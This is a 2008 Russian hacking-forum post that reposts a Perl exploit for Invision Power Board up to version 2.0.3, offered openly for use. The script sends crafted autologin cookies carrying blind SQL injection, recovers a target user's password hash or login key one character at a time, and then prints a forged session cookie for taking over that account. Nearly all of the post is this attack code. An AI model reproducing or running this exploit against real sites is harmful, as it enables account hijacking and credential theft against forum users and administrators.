27.10.2008, 17:18
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
IPB <=2.0.3 SQL-inj Exploit (c) h4cky0u
Автор: +toxa+
heres another sick xploit for 2.0.3 again coded by jamey224. Usally works, except for a few boards that are patched.Enjoy! (c) h4cky0u
http://h4cky0u.org/viewtopic.php?f=2&t=6110
PHP код:
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("Mosiac 1.0" . $ua->agent);
if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}
my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1]; # userid to jack
my $iver = $ARGV[2]; # version 1 or 2
my $cpre = $ARGV[3]; # cookie prefix
my $dbug = $ARGV[4]; # debug?
if (!$ARGV[2])
{
print "The type of the file system is NTFS.\n\n";
print "Exploit C0d3d By Jamey2244\n";
print "Yes I know I'm g00d\n";
print "LeTS g0!!!\n";
exit;
}
my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
my $outputs = '';
for( $i=1; $i < 33; $i++ )
{
for( $j=0; $j < 16; $j++ )
{
my $current = $charset[$j];
my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*";
my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
my $res = $ua->get($path, @cookie);
# If we get a valid sql request then this
# does not appear anywhere in the sources
$pattern = '<title>(.*)Log In(.*)</title>';
$_ = $res->content;
if ($dbug) { print };
if ( !(/$pattern/) )
{
$outputs .= $current;
print "$current\n";
last;
}
}
if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;
PS Материал востановлен
Дата публикации: 16.03.2008, 16:02
Автор +toxa+
|
|
|